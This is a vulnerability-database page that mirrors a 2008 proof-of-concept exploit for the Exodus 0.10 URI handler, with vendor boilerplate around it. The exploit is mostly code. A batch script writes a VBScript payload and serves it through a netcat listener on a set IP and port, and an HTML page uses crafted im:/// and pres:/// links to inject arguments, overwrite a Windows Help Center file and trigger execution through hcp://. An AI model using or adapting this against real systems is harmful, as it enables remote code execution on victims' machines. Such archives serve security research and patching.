Lucene search
+L

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)

🗓️ 20 Nov 2008 00:00:00Reported by Nine:Situations:GroupType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Exodus 0.10 URI Handler Arbitrary Parameter Injection exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6935
17 Nov 200800:00
circl
circl
Circl
CVE-2008-6936
17 Nov 200800:00
circl
circl
Circl
CVE-2008-6937
17 Nov 200800:00
circl
cve
CVE
CVE-2008-6935
11 Aug 200920:25
cve
cve
CVE
CVE-2008-6936
11 Aug 200920:25
cve
cve
CVE
CVE-2008-6937
11 Aug 200920:25
cve
cvelist
Cvelist
CVE-2008-6935
11 Aug 200920:25
cvelist
cvelist
Cvelist
CVE-2008-6936
11 Aug 200920:25
cvelist
cvelist
Cvelist
CVE-2008-6937
11 Aug 200920:25
cvelist
exploitdb
Exploit DB
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)
17 Nov 200800:00
exploitdb
Rows per page
<!--
Exodus v0.10 remote code execution exploit
by Nine:Situations:Group::strawdog

This uses the "-l" argument to overwrite a file
inside Microsoft Help and Support Center folders (oh rgod...)

Firstly run netcat in listen mode to drop the vbscript shell
run this script:

@echo off
rem dropsh.cmd
echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^</SCRIPT^> >> testfile
nc -L -s 192.168.0.1 -p 5222 -vv < testfile

-->
<html>
<head>
<script type="text/javascript">
<!--
function doRedirect() {
location.href = "hcp://system/sysinfo/msinfo.htm";
}
function runcalc() {
window.setTimeout("doRedirect()", 10000);
}
//-->
</script>
<a href="im:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%[email protected]%20-p%20AAAA%20%00" onClick="runcalc()">click me</a><br>
<a href="pres:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%[email protected]%20-p%20AAAA%20%00" onClick="runcalc()">click me</a>
</html>

# milw0rm.com [2008-11-20]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation